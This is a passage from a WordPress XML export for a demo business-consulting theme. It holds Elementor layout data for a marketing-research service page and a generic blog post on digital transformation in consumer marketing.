		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6faa64b","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0bb9c88","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6824581","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"3400a2a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c4b8ef3","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a0af2ca","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4ad2da5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c3411e5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fddc28e","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"fbccab8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2afaea5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"a8024cf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d420dea","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"ab89b5a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8c96bde","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#FF8F3E","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"dc8f05f","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c88ecd3","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a061656","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b9814ba","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3838be4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"72c6e5e","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ee945f4","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05b9e13","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"9ff3f8e","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"2a1f3b6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service.png","id":913},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5c20bfd","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"a5714fa","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #ff8f3e;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b7198e9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"a53f436","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d016178","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"676aa62","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"aee7a43","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"8dd2aa8","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"67ff888","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"3da52cb","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4ffbddf","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"ecb740e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"b0441a2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"00f028b","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9c23145","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"758fa65","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"d84b707","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1aa5536","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7cf28b7","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c141a94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf.jpg","id":955},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"8ead5a5","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"c09431c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"96015f0","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"a8c48df","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"660504e","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"c44209f","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"31b9f34","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1506]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Entering the Next Phase of Digital Transformation</title>
		<link>http://wpdemo.archiwp.com/maxbizz/entering-the-next-phase-of-digital-transformation/</link>
		<pubDate>Mon, 18 Dec 2017 04:13:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=413</guid>
		<description></description>
		<content:encoded><![CDATA[<p><span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.</p>
<p><span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em></p>
<p><img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350"></p>
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.</p>
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”<br><cite>DAVID OSWALD</cite></p>
</blockquote>
<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.</p>
<p><em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em></p>

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>413</wp:post_id>
		<wp:post_date><![CDATA[2017-12-18 04:13:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2017-12-18 04:13:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
